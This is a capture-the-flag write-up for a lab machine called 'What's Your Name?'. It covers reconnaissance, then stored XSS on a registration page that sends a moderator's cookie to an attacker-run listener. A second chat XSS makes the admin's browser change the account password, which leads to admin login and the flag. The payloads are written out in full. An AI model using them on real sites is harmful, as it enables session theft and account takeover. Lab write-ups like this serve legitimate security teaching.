Post

What's Your Name?

What’s Your Name?

💻 First things first, add the worldwap.thm domain name to your hosts file:

1
sudo echo '10.48.168.245 worldwap.thm' >> /etc/hosts

🔍 Then, run an nmap scan: Pasted image 20260605211543.png We have two web servers running on ports 80 and 8081: Pasted image 20260605211914.png

http://worldwap.thm:8081/

🕵️ During the initial reconnaissance phase, Port 80 was found to be active while Port 8081 returned no visible web content on the root path. To identify hidden assets, I performed targeted content discovery against http://worldwap.thm using Feroxbuster.

1
feroxbuster -u http://worldwap.thm/  -x php,html,txt

Pasted image 20260605214525.png

🎯 Next, I tried XSS on the register page. ⚡ First, start the local server:

1
python3 -m http.server 8080

💡 First, I checked if it works: Pasted image 20260605221733.png Pasted image 20260605221745.png As you can see, the request was received. Then: Pasted image 20260605221825.png After a short time, we got a request from the moderator, which means we can steal their cookie: Pasted image 20260605222903.png

1
 <script>fetch('http://10.48.79.98:8080/?'+btoa(document.cookie));</script>

We use btoa() to base64-encode the cookie. Pasted image 20260605223314.png We got it: Pasted image 20260605223418.png Pasted image 20260605223853.png I then went to login.worldwap.thm using the same cookie. This application runs on port 8081: Pasted image 20260605224957.png

The password can only be changed by the admin, and there is a chat option:

Pasted image 20260605224941.png Pasted image 20260605225144.png

1
<script>alert(1)</script>

I tried XSS again, and it worked: Pasted image 20260605225206.png Now we need to change the password through the admin using fetch. First, I inspected the request carefully: Pasted image 20260605225813.png It is just a POST request containing the data, so I tested it first:

1
fetch('/change_password.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'new_password=1234' }).then(r => r.text()).then(console.log);

Pasted image 20260605230347.png As you can see, it worked. Now we need to send it to the chat:

1
<script>fetch('/change_password.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'new_password=1234' }).then(r => r.text()).then(console.log);</script>

Then: Pasted image 20260605230603.png Log in to the same URL (http://login.worldwap.thm/login.php) using the username admin and the password you set: Pasted image 20260605230645.png 🏁 You can see the flag in the same spot as before.

This post is licensed under CC BY 4.0 by the author.